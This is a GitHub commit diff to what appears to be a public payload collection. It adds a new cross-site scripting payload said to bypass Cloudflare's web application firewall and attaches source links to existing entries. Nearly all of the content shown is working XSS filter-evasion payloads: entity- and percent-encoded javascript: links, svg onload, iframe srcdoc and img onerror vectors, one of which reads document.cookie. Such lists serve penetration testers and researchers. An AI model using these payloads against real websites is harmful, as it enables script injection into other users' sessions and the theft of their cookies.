Updated with another bypass for Cloudflare

This commit is contained in:
Infected Drake 2019-08-14 21:30:53 +05:30 committed by GitHub
parent a38a71acdb
commit 08c1246990
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -2998,23 +2998,26 @@ http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3csc
``` ```
### Cloudflare ### Cloudflare
- XSS Bypass by [@c0d3g33k](https://twitter.com/c0d3g33k) - [XSS Bypass](https://twitter.com/spyerror/status/1161432029319376897) by [@spyerror](https://twitter.com/spyerror)
```
<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X
```
- [XSS Bypass](https://pastebin.com/i8Ans4d4) by [@c0d3g33k](https://twitter.com/c0d3g33k)
``` ```
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a> <a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
``` ```
- XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - [XSS Bypasses](https://twitter.com/h1_ragnar) by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar)
``` ```
<svg onload=prompt%26%230000000040document.domain)> <svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)> <svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'> xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``> 1'"><img/src/onerror=.1|alert``>
``` ```
- XSS Bypass by [@RakeshMane10](https://twitter.com/rakeshmane10) - [XSS Bypass](https://twitter.com/RakeshMane10/status/1109008686041759744) by [@RakeshMane10](https://twitter.com/rakeshmane10)
``` ```
<svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
``` ```
- [XSS Bypass](https://twitter.com/ArbazKiraak/status/1090654066986823680) by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
- XSS Bypass by [@ArbazKiraak](https://twitter.com/ArbazKiraak)
``` ```
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>` <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;this['document']['cookie']&rpar;">X</a>`
``` ```